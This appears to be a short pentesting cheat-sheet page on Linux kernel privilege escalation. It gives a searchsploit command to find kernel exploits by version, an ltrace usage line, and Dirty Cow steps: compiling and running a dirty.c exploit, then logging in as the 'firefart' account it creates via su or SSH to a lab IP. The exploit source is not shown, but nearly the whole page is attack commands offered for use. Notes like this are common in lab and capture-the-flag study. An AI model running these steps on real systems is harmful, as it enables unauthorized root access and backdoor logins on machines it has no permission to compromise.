githubEdit

skullKernel Exploits

chevron-rightahashtag
Search Kernel for Exploits
searchsploit "Linux Kernel" | grep <version>
Traces library function calls
ltrace ProgramName
chevron-rightDirty Cowhashtag
Compile it
gcc -pthread dirty.c -o dirty -lcrypt; chmod +x dirty; ./dirty
Log as firefart
su firefart
ssh firefart@10.10.10.10

Last updated